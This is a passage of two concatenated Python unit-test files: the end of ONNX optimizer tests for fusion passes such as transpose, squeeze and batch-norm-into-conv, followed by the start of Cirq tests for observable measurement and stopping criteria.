[(TensorProto.FLOAT, (2, 3), "Y4")]))
graph = helper.make_graph(
nodes,
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (2, 3, 4))],
[helper.make_tensor_value_info("A", TensorProto.FLOAT, (4, 3, 2)),
helper.make_tensor_value_info("Y4", TensorProto.FLOAT, (4, 3, 2))])
optimized_model = self._optimized(graph, ["fuse_consecutive_transposes"])
# Transpose, Constant (trip count), Constant (cond), Loop
assert len(list(optimized_model.graph.node)) == 4
# Transpose
assert len(optimized_model.graph.node[3].attribute[0].g.node) == 1
def test_fuse_transpose_default(self): # type: () -> None
trans1 = helper.make_node("Transpose", ["X"], ["Y"])
trans2 = helper.make_node("Transpose", ["Y"], ["Z"])
graph = helper.make_graph(
[trans1, trans2],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (2, 3, 4))],
[helper.make_tensor_value_info("Z", TensorProto.FLOAT, (2, 3, 4))])
optimized_model = self._optimized(graph, ["fuse_consecutive_transposes"])
assert len(list(optimized_model.graph.node)) == 0
def test_fuse_transpose_default_no_fuse(self): # type: () -> None
trans1 = helper.make_node("Transpose", ["X"], ["Y"])
trans2 = helper.make_node("Transpose", ["Y"], ["Z"], perm=[0, 1, 2])
graph = helper.make_graph(
[trans1, trans2],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (2, 3, 4))],
[helper.make_tensor_value_info("Z", TensorProto.FLOAT, (4, 3, 2))])
optimized_model = self._optimized(graph, ["fuse_consecutive_transposes"])
assert len(list(optimized_model.graph.node)) == 2
for node in optimized_model.graph.node:
assert node.op_type == "Transpose"
def test_fuse_transpose_into_gemm(self): # type: () -> None
nodes = [helper.make_node("Transpose", ["X"], ["A"], perm=[1, 0]),
helper.make_node("Transpose", ["Y"], ["B"], perm=[1, 0]),
helper.make_node("Gemm", ["A", "B", "C"], ["Z"])]
nodes.extend(self._make_fake_loop_op(
[helper.make_node("Transpose", ["_X"], ["_A"], perm=[1, 0]),
helper.make_node("Transpose", ["_Y"], ["_B"], perm=[1, 0]),
helper.make_node("Gemm", ["_A", "_B", "_C"], ["_Z2"])],
[(TensorProto.FLOAT, (2, 3), "X"),
(TensorProto.FLOAT, (5, 2), "Y"),
(TensorProto.FLOAT, (3, 5), "C")],
[(TensorProto.FLOAT, (2, 3), "Z2")]))
graph = helper.make_graph(
nodes,
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (2, 3)),
helper.make_tensor_value_info("Y", TensorProto.FLOAT, (5, 2)),
helper.make_tensor_value_info("C", TensorProto.FLOAT, (3, 5))],
[helper.make_tensor_value_info("Z", TensorProto.FLOAT, (3, 5))])
optimized_model = self._optimized(graph, ["fuse_transpose_into_gemm"])
# Gemm, Constant (trip count), Constant (cond), Loop
assert len(list(optimized_model.graph.node)) == 4
assert optimized_model.graph.node[0].op_type == "Gemm"
# Gemm
assert len(optimized_model.graph.node[3].attribute[0].g.node) == 1
assert optimized_model.graph.node[3].attribute[0].g.node[0].op_type == "Gemm"
def test_fuse_add_bias_into_conv_use_weight_shape(self): # type: () -> None
nodes = [helper.make_node("Conv", ["X", "Y"], ["Z"]),
helper.make_node("Add", ["Z", "A"], ["B"])]
nodes.extend(self._make_fake_loop_op(
[helper.make_node("Conv", ["_X", "_Y"], ["_Z"]),
helper.make_node("Add", ["_Z", "_A"], ["_B2"])],
[(TensorProto.FLOAT, (1, 5, 3, 3), "X"),
(TensorProto.FLOAT, (16, 5, 3, 3), "Y"),
(TensorProto.FLOAT, (16, 1, 1), "A")],
[(TensorProto.FLOAT, (1, 16, 3, 3), "B2")]))
graph = helper.make_graph(
nodes,
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 5, 3, 3)),
helper.make_tensor_value_info("Y", TensorProto.FLOAT, (16, 5, 3, 3)),
helper.make_tensor_value_info("A", TensorProto.FLOAT, (16, 1, 1))],
[helper.make_tensor_value_info("B", TensorProto.FLOAT, (1, 16, 1, 1))],
)
optimized_model = self._optimized(graph, ["fuse_add_bias_into_conv"])
# Squeeze, Conv, Constant (trip count), Constant (condition), Loop
assert len(list(optimized_model.graph.node)) == 5
assert optimized_model.graph.node[0].op_type == 'Squeeze'
assert optimized_model.graph.node[1].op_type == 'Conv'
assert optimized_model.graph.output[0].name == 'Z'
# Squeeze, Conv
assert len(optimized_model.graph.node[4].attribute[0].g.node) == 2
assert optimized_model.graph.node[4].attribute[0].g.node[0].op_type == 'Squeeze'
assert optimized_model.graph.node[4].attribute[0].g.node[1].op_type == 'Conv'
# Output 1 since 0 is 'cond'
assert optimized_model.graph.node[4].attribute[0].g.output[1].name == '_Z'
def test_fuse_add_bias_into_conv_use_weight_shape_with_tile(self): # type: () -> None
conv = helper.make_node("Conv", ["X", "Y"], ["Z"])
add = helper.make_node("Add", ["Z", "A"], ["B"])
graph = helper.make_graph(
[conv, add],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 5, 3, 3)),
helper.make_tensor_value_info("Y", TensorProto.FLOAT, (16, 5, 3, 3)),
helper.make_tensor_value_info("A", TensorProto.FLOAT, (1,))],
[helper.make_tensor_value_info("B", TensorProto.FLOAT, (1, 16, 1, 1))],
)
optimized_model = self._optimized(graph, ["fuse_add_bias_into_conv"])
assert len(list(optimized_model.graph.node)) == 3
assert len(optimized_model.graph.value_info) == 1
assert optimized_model.graph.value_info[0].type.tensor_type.elem_type == TensorProto.INT64
assert len(optimized_model.graph.value_info[0].type.tensor_type.shape.dim) == 1
assert optimized_model.graph.node[0].op_type == 'Constant'
assert optimized_model.graph.node[1].op_type == 'Tile'
assert optimized_model.graph.node[2].op_type == 'Conv'
assert optimized_model.graph.output[0].name == 'Z'
def test_fuse_add_bias_into_conv_use_conv_shape(self): # type: () -> None
sub = helper.make_node("Sub", ["M", "N"], ["Y"])
conv = helper.make_node("Conv", ["X", "Y"], ["Z"])
add = helper.make_node("Add", ["Z", "A"], ["B"])
graph = helper.make_graph(
[sub, conv, add],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 5, 3, 3)),
helper.make_tensor_value_info("M", TensorProto.FLOAT, (16, 5, 3, 3)),
helper.make_tensor_value_info("N", TensorProto.FLOAT, (16, 5, 3, 3)),
helper.make_tensor_value_info("A", TensorProto.FLOAT, (1, 16, 1, 1))],
[helper.make_tensor_value_info("B", TensorProto.FLOAT, (1, 16, 1, 1))],
value_info=[
helper.make_tensor_value_info("Z", TensorProto.FLOAT, (1, 16, 1, 1))
],
)
optimized_model = self._optimized(graph, ["fuse_add_bias_into_conv"])
assert len(optimized_model.graph.node) == 3
assert optimized_model.graph.node[0].op_type == 'Sub'
assert optimized_model.graph.node[1].op_type == 'Squeeze'
assert optimized_model.graph.node[2].op_type == 'Conv'
assert optimized_model.graph.output[0].name == 'Z'
assert optimized_model.graph.output[0].type.tensor_type.elem_type == TensorProto.FLOAT
assert len(optimized_model.graph.output[0].type.tensor_type.shape.dim) == 4
def test_fuse_add_bias_into_conv_use_move_constant(self): # type: () -> None
conv = helper.make_node("Conv", ["X", "Y"], ["Z"])
constant = helper.make_node("Constant", [], ["A"],
value=helper.make_tensor(
name="bias",
data_type=TensorProto.FLOAT,
dims=(16, 1, 1),
vals=np.random.randn(16).astype(np.float32).tolist()))
add = helper.make_node("Add", ["Z", "A"], ["B"])
graph = helper.make_graph(
[conv, constant, add],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 5, 3, 3)),
helper.make_tensor_value_info("Y", TensorProto.FLOAT, (16, 5, 3, 3))],
[helper.make_tensor_value_info("B", TensorProto.FLOAT, (1, 16, 1, 1))],
value_info=[
helper.make_tensor_value_info("A", TensorProto.FLOAT, (16, 1, 1)),
]
)
optimized_model = self._optimized(graph, ["fuse_add_bias_into_conv"])
assert len(optimized_model.graph.node) == 3
assert optimized_model.graph.node[0].op_type == 'Constant'
assert optimized_model.graph.node[1].op_type == 'Squeeze'
assert optimized_model.graph.node[2].op_type == 'Conv'
assert optimized_model.graph.output[0].name == 'Z'
assert optimized_model.graph.output[0].type.tensor_type.elem_type == TensorProto.FLOAT
assert len(optimized_model.graph.output[0].type.tensor_type.shape.dim) == 4
def test_fuse_add_bias_into_conv_squeeze_1d_bias_no_fuse(self): # type: () -> None
conv = helper.make_node("Conv", ["X", "Y"], ["Z"])
add = helper.make_node("Add", ["Z", "A"], ["B"])
graph = helper.make_graph(
[conv, add],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 5, 3, 3)),
helper.make_tensor_value_info("Y", TensorProto.FLOAT, (16, 5, 3, 3)),
helper.make_tensor_value_info("A", TensorProto.FLOAT, (3,))],
[helper.make_tensor_value_info("B", TensorProto.FLOAT, (1, 16, 1, 3))],
value_info=[
helper.make_tensor_value_info("Z", TensorProto.FLOAT, (1, 16, 1, 1)),
]
)
optimized_model = self._optimized(graph, ["fuse_add_bias_into_conv"])
assert len(list(optimized_model.graph.node)) == 2
assert optimized_model.graph.node[0].op_type == 'Conv'
assert optimized_model.graph.node[1].op_type == 'Add'
def test_fuse_add_bias_into_conv_squeeze_3d_bias_no_fuse(self): # type: () -> None
conv = helper.make_node("Conv", ["X", "Y"], ["Z"])
add = helper.make_node("Add", ["Z", "A"], ["B"])
graph = helper.make_graph(
[conv, add],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 5, 3, 3)),
helper.make_tensor_value_info("Y", TensorProto.FLOAT, (16, 5, 3, 3)),
helper.make_tensor_value_info("A", TensorProto.FLOAT, (16, 3, 3))],
[helper.make_tensor_value_info("B", TensorProto.FLOAT, (1, 16, 3, 3))],
value_info=[
helper.make_tensor_value_info("Z", TensorProto.FLOAT, (1, 16, 1, 1)),
]
)
optimized_model = self._optimized(graph, ["fuse_add_bias_into_conv"])
assert len(list(optimized_model.graph.node)) == 2
assert optimized_model.graph.node[0].op_type == 'Conv'
assert optimized_model.graph.node[1].op_type == 'Add'
def test_fuse_add_bias_into_conv_squeeze_4d_bias_no_fuse(self): # type: () -> None
conv = helper.make_node("Conv", ["X", "Y"], ["Z"])
add = helper.make_node("Add", ["Z", "A"], ["B"])
graph = helper.make_graph(
[conv, add],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 5, 3, 3)),
helper.make_tensor_value_info("Y", TensorProto.FLOAT, (16, 5, 3, 3)),
helper.make_tensor_value_info("A", TensorProto.FLOAT, (1, 16, 3, 3))],
[helper.make_tensor_value_info("B", TensorProto.FLOAT, (1, 16, 3, 3))]
)
optimized_model = self._optimized(graph, ["fuse_add_bias_into_conv"])
assert len(list(optimized_model.graph.node)) == 2
assert optimized_model.graph.node[0].op_type == 'Conv'
assert optimized_model.graph.node[1].op_type == 'Add'
def test_fuse_consecutive_squeezes(self): # type: () -> None
nodes = [helper.make_node("Squeeze", ["X"], ["Y"], axes=[0, 4, 5]),
helper.make_node("Squeeze", ["Y"], ["Z"], axes=[0, 3])]
nodes.extend(self._make_fake_loop_op(
[helper.make_node("Squeeze", ["_X"], ["_Y"], axes=[0, 4, 5]),
helper.make_node("Squeeze", ["_Y"], ["_Z2"], axes=[0, 3])],
[(TensorProto.FLOAT, (1, 1, 2, 3, 1, 1, 1, 1, 8, 9), "X")],
[(TensorProto.FLOAT, (2, 3, 1, 8, 9), "Z2")]))
graph = helper.make_graph(
nodes,
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 1, 2, 3, 1, 1, 1, 1, 8, 9))],
[helper.make_tensor_value_info("Z", TensorProto.FLOAT, (2, 3, 1, 8, 9))])
optimized_model = self._optimized(graph, ["fuse_consecutive_squeezes"])
# Squeeze, Constant (trip count), Constant (cond), Loop
assert optimized_model.graph.node[0].op_type == "Squeeze"
assert list(optimized_model.graph.node[0].attribute[0].ints) == [0, 1, 4, 5, 6]
assert len(list(optimized_model.graph.node)) == 4
def test_fuse_consecutive_squeezes_default(self): # type: () -> None
squeeze1 = helper.make_node("Squeeze", ["X"], ["Y"], axes=[0, 4, 5])
squeeze2 = helper.make_node("Squeeze", ["Y"], ["Z"], axes=[0, 3])
squeeze3 = helper.make_node("Squeeze", ["Z"], ["A"], axes=[2])
nodes = [squeeze1, squeeze2, squeeze3]
graph = helper.make_graph(
nodes,
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 1, 2, 3, 1, 1, 1, 1, 8, 9))],
[helper.make_tensor_value_info("A", TensorProto.FLOAT, (2, 3, 8, 9))])
optimized_model = self._optimized(graph, ["fuse_consecutive_squeezes"])
assert optimized_model.graph.node[0].op_type == "Squeeze"
assert list(optimized_model.graph.node[0].attribute[0].ints) == [0, 1, 4, 5, 6, 7]
assert len(list(optimized_model.graph.node)) == 1
def test_fuse_consecutive_squeezes_random(self): # type: () -> None
x_shape = [1, 1, 1, 3, 4, 1, 6, 1, 1, 9]
s1_one_indices = [i for i, a in enumerate(x_shape) if a == 1]
s1_axes = np.random.choice(s1_one_indices, size=np.random.randint(low=1, high=len(s1_one_indices) - 1),
replace=False)
s2_x_shape = [a for i, a in enumerate(x_shape) if i not in s1_axes]
s2_one_indices = [i for i, a in enumerate(s2_x_shape) if a == 1]
s2_axes = s2_one_indices
squeeze1 = helper.make_node("Squeeze", ["X"], ["Y"], axes=s1_axes)
squeeze2 = helper.make_node("Squeeze", ["Y"], ["Z"], axes=s2_axes)
nodes = [squeeze1, squeeze2]
graph = helper.make_graph(
nodes,
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, x_shape)],
[helper.make_tensor_value_info("Z", TensorProto.FLOAT, (3, 4, 6, 9))])
optimized_model = self._optimized(graph, ["fuse_consecutive_squeezes"])
assert optimized_model.graph.node[0].op_type == "Squeeze"
assert list(optimized_model.graph.node[0].attribute[0].ints) == [0, 1, 2, 5, 7, 8]
assert len(list(optimized_model.graph.node)) == 1
def test_fuse_consecutive_squeezes_multi_uses(self): # type: () -> None
squeeze1 = helper.make_node("Squeeze", ["X"], ["Y"], axes=[0, 4, 5])
add = helper.make_node("Add", ["Y", "A"], ["Z2"])
squeeze2 = helper.make_node("Squeeze", ["Y"], ["Z"], axes=[0, 3])
graph = helper.make_graph(
[squeeze1, add, squeeze2],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (1, 1, 2, 3, 1, 1, 1, 1, 8, 9)),
helper.make_tensor_value_info("A", TensorProto.FLOAT, (1,))],
[helper.make_tensor_value_info("Z", TensorProto.FLOAT, (2, 3, 1, 8, 9)),
helper.make_tensor_value_info("Z2", TensorProto.FLOAT, (1, 2, 3, 1, 1, 8, 9))])
optimized_model = self._optimized(graph, ["fuse_consecutive_squeezes"])
assert optimized_model.graph.node[0].op_type == "Squeeze"
assert list(optimized_model.graph.node[0].attribute[0].ints) == [0, 4, 5]
assert optimized_model.graph.node[2].op_type == "Squeeze"
assert optimized_model.graph.node[2].input == ["X"]
assert list(optimized_model.graph.node[2].attribute[0].ints) == [0, 1, 4, 5, 6]
assert len(list(optimized_model.graph.node)) == 3
def test_preserve_value_info(self): # type: () -> None
trans1 = helper.make_node("Transpose", ["X"], ["Y"], perm=[1, 0, 2])
trans2 = helper.make_node("Transpose", ["Y"], ["Z"], perm=[2, 0, 1])
trans3 = helper.make_node("Transpose", ["Z"], ["A"], perm=[2, 0, 1])
graph = helper.make_graph(
[trans1, trans2, trans3],
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (2, 3, 4))],
[helper.make_tensor_value_info("A", TensorProto.FLOAT, (2, 4, 3))])
vi = helper.make_tensor_value_info("Y", TensorProto.FLOAT, (3, 2, 4))
graph.value_info.extend([vi])
optimized_model = self._optimized(graph, ["nop"])
assert list(optimized_model.graph.value_info) == [vi]
assert len(list(optimized_model.graph.node)) == 3
def test_split(self): # type: () -> None
node = onnx.helper.make_node(
'Constant',
inputs=[],
outputs=['X'],
value=onnx.helper.make_tensor(
name='X',
data_type=TensorProto.FLOAT,
dims=[1],
vals=[5],
),
)
graph = helper.make_graph(
[node],
'test-optimize-split',
[],
[helper.make_tensor_value_info('X', TensorProto.FLOAT, (1,))])
init_model = self._optimized(graph, ['split_init'])
self.assertEqual(len(init_model.graph.node), 1)
self.assertEqual(len(init_model.graph.output), 1)
self.assertEqual(init_model.graph.node[0].op_type, 'Constant')
predict_model = self._optimized(graph, ['split_predict'])
self.assertEqual(len(predict_model.graph.node), 0)
self.assertEqual(len(predict_model.graph.input), 1)
self.assertEqual(predict_model.graph.input[0].name, 'X')
def test_lift_lex_loop(self): # type: () -> None
nodes = [helper.make_node("Identity", ["X"], ["Y"])]
nodes.extend(self._make_fake_loop_op(
[helper.make_node("Identity", ["X"], ["_Y2"]),
helper.make_node("Identity", ["Y"], ["_Y3"])],
[],
[(TensorProto.FLOAT, (5,), "Y2"),
(TensorProto.FLOAT, (5,), "Y3")]))
graph = helper.make_graph(
nodes,
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (5,))],
[helper.make_tensor_value_info("Y", TensorProto.FLOAT, (5,)),
helper.make_tensor_value_info("Y2", TensorProto.FLOAT, (5,))])
optimized_model = self._optimized(graph, ["lift_lexical_references"])
assert len(optimized_model.graph.node) == 4
# body_graph, __control_inputs
assert len(optimized_model.graph.node[3].attribute) == 2
assert optimized_model.graph.node[3].attribute[1].name == "__control_inputs"
assert optimized_model.graph.node[3].attribute[1].strings[0] == b"X"
assert optimized_model.graph.node[3].attribute[1].strings[1] == b"Y"
def test_lift_lex_if(self): # type: () -> None
nodes = [helper.make_node("Identity", ["X"], ["Y"])]
nodes.extend(self._make_fake_if_op(
[helper.make_node("Identity", ["X"], ["_Y2"]),
helper.make_node("Identity", ["Y"], ["_Y3"])],
[helper.make_node("Identity", ["X"], ["_Y2"]),
helper.make_node("Identity", ["X"], ["_Y3"])],
[(TensorProto.FLOAT, (5,), "Y2"),
(TensorProto.FLOAT, (5,), "Y3")]))
graph = helper.make_graph(
nodes,
"test",
[helper.make_tensor_value_info("X", TensorProto.FLOAT, (5,))],
[helper.make_tensor_value_info("Y", TensorProto.FLOAT, (5,)),
helper.make_tensor_value_info("Y2", TensorProto.FLOAT, (5,))])
# "If" node now diverges from ONNX schema. Disable checking.
optimized_model = self._optimized(graph, ["lift_lexical_references"])
# Identity, Constant (condition), If
assert len(optimized_model.graph.node) == 3
# else_branch, then_branch, __control_inputs
assert len(optimized_model.graph.node[2].attribute) == 3
assert optimized_model.graph.node[2].attribute[2].name == "__control_inputs"
assert optimized_model.graph.node[2].attribute[2].strings[0] == b"X"
assert optimized_model.graph.node[2].attribute[2].strings[1] == b"Y"
def test_fuse_bn_into_conv_simple(self): # type: () -> None
for (tensor_type, np_type) in [(TensorProto.FLOAT, np.float32), (TensorProto.DOUBLE, np.float64)]:
conv = helper.make_node("Conv", ["X", "W", "B"], ["Y"])
bn = helper.make_node("BatchNormalization", ["Y", "scale", "b", "mean", "var"], ["Z"])
W = np.random.randn(3, 2, 5, 5).astype(np_type) + 2
B = np.random.randn(3,).astype(np_type) + 2
scale = np.random.randn(3,).astype(np_type) + 2
b = np.random.randn(3,).astype(np_type) + 2
mean = np.random.randn(3,).astype(np_type) + 2
var = np.abs(np.random.randn(3,).astype(np_type)) + 2
initializers = [
helper.make_tensor(name, tensor_type, npa.shape, npa.tobytes(), raw=True)
for name, npa in [('W', W), ('B', B), ('scale', scale), ('b', b), ('mean', mean), ('var', var)]
]
graph = helper.make_graph(
[conv, bn],
"test",
[helper.make_tensor_value_info("X", tensor_type, (5, 2, 28, 28)),
helper.make_tensor_value_info("W", tensor_type, (3, 2, 5, 5)),
helper.make_tensor_value_info("B", tensor_type, (3,)),
helper.make_tensor_value_info("scale", tensor_type, (3,)),
helper.make_tensor_value_info("b", tensor_type, (3,)),
helper.make_tensor_value_info("mean", tensor_type, (3,)),
helper.make_tensor_value_info("var", tensor_type, (3,))],
[helper.make_tensor_value_info("Z", tensor_type, (5, 3, 24, 24))],
initializer=initializers,
value_info=[
helper.make_tensor_value_info("Y", tensor_type, (5, 3, 24, 24))
]
)
optimized_model = self._optimized(graph, ["fuse_bn_into_conv"])
self.assertEqual(len(optimized_model.graph.node), 1)
self.assertEqual(optimized_model.graph.node[0].op_type, 'Conv')
self.assertEqual(len(optimized_model.graph.initializer), 2)
new_W = numpy_helper.to_array(optimized_model.graph.initializer[0])
new_b = numpy_helper.to_array(optimized_model.graph.initializer[1])
f = scale / np.sqrt(var + 1e-5)
np.testing.assert_almost_equal((B - mean) * f + b, new_b)
np.testing.assert_almost_equal(W * f[:, np.newaxis, np.newaxis, np.newaxis], new_W)
if __name__ == '__main__':
unittest.main()
|
|
# Copyright 2020 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tempfile
from typing import Iterable, Dict, List
import numpy as np
import pytest
import cirq
import cirq.work as cw
from cirq.work import _MeasurementSpec, BitstringAccumulator, group_settings_greedy, InitObsSetting
from cirq.work.observable_measurement import (
_with_parameterized_layers,
_get_params_for_setting,
_pad_setting,
_subdivide_meas_specs,
_aggregate_n_repetitions,
_check_meas_specs_still_todo,
StoppingCriteria,
_parse_checkpoint_options,
measure_observables_df,
CheckpointFileOptions,
VarianceStoppingCriteria,
measure_observables,
RepetitionsStoppingCriteria,
)
def test_with_parameterized_layers():
qs = cirq.LineQubit.range(3)
circuit = cirq.Circuit(
[
cirq.H.on_each(*qs),
cirq.CZ(qs[0], qs[1]),
cirq.CZ(qs[1], qs[2]),
]
)
circuit2 = _with_parameterized_layers(circuit, qubits=qs, needs_init_layer=False)
assert circuit != circuit2
assert len(circuit2) == 3 + 3 # 3 original, then X, Y, measure layer
*_, xlayer, ylayer, measurelayer = circuit2.moments
for op in xlayer.operations:
assert isinstance(op.gate, cirq.XPowGate)
assert op.gate.exponent.name.endswith('-Xf')
for op in ylayer.operations:
assert isinstance(op.gate, cirq.YPowGate)
assert op.gate.exponent.name.endswith('-Yf')
for op in measurelayer:
assert isinstance(op.gate, cirq.MeasurementGate)
circuit3 = _with_parameterized_layers(circuit, qubits=qs, needs_init_layer=True)
assert circuit != circuit3
assert circuit2 != circuit3
assert len(circuit3) == 2 + 3 + 3
xlayer, ylayer, *_ = circuit3.moments
for op in xlayer.operations:
assert isinstance(op.gate, cirq.XPowGate)
assert op.gate.exponent.name.endswith('-Xi')
for op in ylayer.operations:
assert isinstance(op.gate, cirq.YPowGate)
assert op.gate.exponent.name.endswith('-Yi')
def test_get_params_for_setting():
qubits = cirq.LineQubit.range(3)
a, b, c = qubits
init_state = cirq.KET_PLUS(a) * cirq.KET_ZERO(b)
observable = cirq.X(a) * cirq.Y(b)
setting = cw.InitObsSetting(init_state=init_state, observable=observable)
padded_setting = _pad_setting(setting, qubits=qubits)
assert padded_setting.init_state == cirq.KET_PLUS(a) * cirq.KET_ZERO(b) * cirq.KET_ZERO(c)
assert padded_setting.observable == cirq.X(a) * cirq.Y(b) * cirq.Z(c)
assert init_state == cirq.KET_PLUS(a) * cirq.KET_ZERO(b)
assert observable == cirq.X(a) * cirq.Y(b)
needs_init_layer = True
with pytest.raises(ValueError):
_get_params_for_setting(
padded_setting,
flips=[0, 0],
qubits=qubits,
needs_init_layer=needs_init_layer,
)
params = _get_params_for_setting(
padded_setting,
flips=[0, 0, 1],
qubits=qubits,
needs_init_layer=needs_init_layer,
)
assert all(
x in params
for x in [
'0-Xf',
'0-Yf',
'1-Xf',
'1-Yf',
'2-Xf',
'2-Yf',
'0-Xi',
'0-Yi',
'1-Xi',
'1-Yi',
'2-Xi',
'2-Yi',
]
)
circuit = cirq.Circuit(cirq.I.on_each(*qubits))
circuit = _with_parameterized_layers(
circuit,
qubits=qubits,
needs_init_layer=needs_init_layer,
)
circuit = circuit[:-1] # remove measurement so we can compute <Z>
psi = cirq.Simulator().simulate(circuit, param_resolver=params)
ma = cirq.Z(a).expectation_from_state_vector(psi.final_state_vector, qubit_map=psi.qubit_map)
mb = cirq.Z(b).expectation_from_state_vector(psi.final_state_vector, qubit_map=psi.qubit_map)
mc = cirq.Z(c).expectation_from_state_vector(psi.final_state_vector, qubit_map=psi.qubit_map)
np.testing.assert_allclose([ma, mb, mc], [1, 0, -1])
def test_params_and_settings():
qubits = cirq.LineQubit.range(1)
(q,) = qubits
tests = [
(cirq.KET_ZERO, cirq.Z, 1),
(cirq.KET_ONE, cirq.Z, -1),
(cirq.KET_PLUS, cirq.X, 1),
(cirq.KET_MINUS, cirq.X, -1),
(cirq.KET_IMAG, cirq.Y, 1),
(cirq.KET_MINUS_IMAG, cirq.Y, -1),
(cirq.KET_ZERO, cirq.Y, 0),
]
for init, obs, coef in tests:
setting = cw.InitObsSetting(
init_state=init(q),
observable=obs(q),
)
circuit = cirq.Circuit(cirq.I.on_each(*qubits))
circuit = _with_parameterized_layers(circuit, qubits=qubits, needs_init_layer=True)
params = _get_params_for_setting(
setting, flips=[False], qubits=qubits, needs_init_layer=True
)
circuit = circuit[:-1] # remove measurement so we can compute <Z>
psi = cirq.Simulator().simulate(circuit, param_resolver=params)
z = cirq.Z(q).expectation_from_state_vector(psi.final_state_vector, qubit_map=psi.qubit_map)
assert np.abs(coef - z) < 1e-2, f'{init} {obs} {coef}'
def test_subdivide_meas_specs():
qubits = cirq.LineQubit.range(2)
q0, q1 = qubits
setting = cw.InitObsSetting(
init_state=cirq.KET_ZERO(q0) * cirq.KET_ZERO(q1), observable=cirq.X(q0) * cirq.Y(q1)
)
meas_spec = cw._MeasurementSpec(
max_setting=setting,
circuit_params={
'beta': 0.123,
'gamma': 0.456,
},
)
flippy_mspecs, repetitions = _subdivide_meas_specs(
meas_specs=[meas_spec], repetitions=100_000, qubits=qubits, readout_symmetrization=True
)
fmspec1, fmspec2 = flippy_mspecs
assert repetitions == 50_000
assert fmspec1.meas_spec == meas_spec
assert fmspec2.meas_spec == meas_spec
assert np.all(fmspec2.flips)
assert not np.any(fmspec1.flips)
assert list(fmspec1.param_tuples()) == [
('0-Xf', 0),
('0-Yf', -0.5),
('0-Xi', 0),
('0-Yi', 0),
('1-Xf', 0.5),
('1-Yf', 0),
('1-Xi', 0),
('1-Yi', 0),
('beta', 0.123),
('gamma', 0.456),
]
def test_aggregate_n_repetitions():
with pytest.warns(UserWarning):
reps = _aggregate_n_repetitions({5, 6})
assert reps == 6
class _MockBitstringAccumulator(BitstringAccumulator):
def __init__(self):
super().__init__(
meas_spec=None,
simul_settings=None,
qubit_to_index={q: i for i, q in enumerate(cirq.LineQubit.range(5))},
)
def covariance(self, *, atol=1e-8) -> np.ndarray:
cov = np.cov(self.bitstrings.T, ddof=1)
assert cov.shape == (5, 5)
return cov / len(self.bitstrings)
def test_variance_stopping_criteria():
stop = cw.VarianceStoppingCriteria(variance_bound=1e-6)
acc = _MockBitstringAccumulator()
assert stop.more_repetitions(acc) == 10_000
rs = np.random.RandomState(52)
# small number of results
acc.consume_results(rs.choice([0, 1], size=(100, 5)).astype(np.uint8))
assert stop.more_repetitions(acc) == 10_000
# large number of results
acc.consume_results(rs.choice([0, 1], size=(10_000, 5)).astype(np.uint8))
assert stop.more_repetitions(acc) == 0
class _WildVarianceStoppingCriteria(StoppingCriteria):
def __init__(self):
self._state = 0
def more_repetitions(self, accumulator: BitstringAccumulator) -> int:
"""Ignore everything, request either 5 or 6 repetitions."""
self._state += 1
return [5, 6][self._state % 2]
def test_variance_stopping_criteria_aggregate_n_repetitions():
stop = _WildVarianceStoppingCriteria()
acc1 = _MockBitstringAccumulator()
acc2 = _MockBitstringAccumulator()
accumulators = {'FakeMeasSpec1': acc1, 'FakeMeasSpec2': acc2}
with pytest.warns(UserWarning, match='the largest value will be used: 6.'):
still_todo, reps = _check_meas_specs_still_todo(
meas_specs=sorted(accumulators.keys()),
accumulators=accumulators,
stopping_criteria=stop,
)
assert still_todo == ['FakeMeasSpec1', 'FakeMeasSpec2']
assert reps == 6
def test_repetitions_stopping_criteria():
stop = cw.RepetitionsStoppingCriteria(total_repetitions=50_000)
acc = _MockBitstringAccumulator()
todos = [stop.more_repetitions(acc)]
for _ in range(6):
acc.consume_results(np.zeros((10_000, 5), dtype=np.uint8))
todos.append(stop.more_repetitions(acc))
assert todos == [10_000] * 5 + [0, 0]
def test_repetitions_stopping_criteria_partial():
stop = cw.RepetitionsStoppingCriteria(total_repetitions=5_000, repetitions_per_chunk=1_000_000)
acc = _MockBitstringAccumulator()
assert stop.more_repetitions(acc) == 5_000
def _set_up_meas_specs_for_testing():
q0, q1 = cirq.LineQubit.range(2)
setting = cw.InitObsSetting(
init_state=cirq.KET_ZERO(q0) * cirq.KET_ZERO(q1), observable=cirq.X(q0) * cirq.Y(q1)
)
meas_spec = _MeasurementSpec(
max_setting=setting,
circuit_params={
'beta': 0.123,
'gamma': 0.456,
},
)
bsa = cw.BitstringAccumulator(
meas_spec, [], {q: i for i, q in enumerate(cirq.LineQubit.range(3))}
)
return bsa, meas_spec
def test_meas_specs_still_todo():
bsa, meas_spec = _set_up_meas_specs_for_testing()
stop = cw.RepetitionsStoppingCriteria(1_000)
# 1. before taking any data
still_todo, reps = _check_meas_specs_still_todo(
meas_specs=[meas_spec],
accumulators={meas_spec: bsa},
stopping_criteria=stop,
)
assert still_todo == [meas_spec]
assert reps == 1_000
# 2. After taking a mocked-out 997 shots.
bsa.consume_results(np.zeros((997, 3), dtype=np.uint8))
still_todo, reps = _check_meas_specs_still_todo(
meas_specs=[meas_spec],
accumulators={meas_spec: bsa},
stopping_criteria=stop,
)
